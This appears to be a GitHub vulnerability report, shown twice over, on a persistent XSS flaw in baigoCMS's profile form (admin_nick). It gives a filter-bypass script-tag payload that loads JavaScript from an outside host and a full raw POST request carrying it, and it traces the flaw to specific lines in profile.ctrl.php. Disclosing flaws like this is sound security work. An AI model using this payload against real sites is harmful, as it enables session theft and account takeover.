A xss vulnerability was discovered in baigoCMS.
There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form(admin_nick) parameter post to the
/public/console/profile/info-submit/
POC:
xss payload:<sCRiPt/SrC=//your js>
POST /public/console/profile/info-submit/?1570709270213at0.7949324520660688 HTTP/1.1Host: ad.comProxy-Connection: keep-aliveContent-Length: 116Pragma: no-cacheCache-Control: no-cacheAccept: application/json, text/javascript, */*; q=0.01Origin: http://ad.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://ad.com/public/console/profile/info/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: baigo_sso_admin_id=1; baigo_sso_admin_hash=62bcd73f59081180cdda5bdf87d86b40; baigo_sso_admin_login_type=form; baigo_sso_admin_cookie_time=1570709261; PHPSESSID=268dc2000398555211fc455bbc0ded26; BX=8k8fbjteptoil&b=3&s=5v; baigoSSOssinID=0de8f68574d90c91896a1ee2a2f1dcaa__token__=417102b0cdb072c660d1dca097b83ac1&admin_pass=123123&admin_nick=%3CsCRiPt%2FSrC%3D%2F%2F%C3%A7.top%2FImLm%3E
Submit this form, after refreshing, you can find that our xss statement was successfully executed.
Vulnerability Analysis
Filename:app/ctrl/console/profile.ctrl.php function:infoSubmit Line 70 ,It filters the content on the input.
Continue to follow up on this process
Because the incoming argument is an array, it will go into the fillParam method of line 352.
In the 826 line, enter the safe function to filter the input content.
Filtering the input content by xss and sql injection.But we can bypass this.
payload:
<sCRiPt/SrC=//js>
The text was updated successfully, but these errors were encountered:
Vulnerability description
A xss vulnerability was discovered in baigoCMS.
There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form(admin_nick) parameter post to the
/public/console/profile/info-submit/
POC:
xss payload:
<sCRiPt/SrC=//your js>Submit this form, after refreshing, you can find that our xss statement was successfully executed.




Vulnerability Analysis
Filename:app/ctrl/console/profile.ctrl.php function:infoSubmit Line 70 ,It filters the content on the input.







Continue to follow up on this process
Because the incoming argument is an array, it will go into the fillParam method of line 352.
In the 826 line, enter the safe function to filter the input content.
Filtering the input content by xss and sql injection.But we can bypass this.
payload:
The text was updated successfully, but these errors were encountered: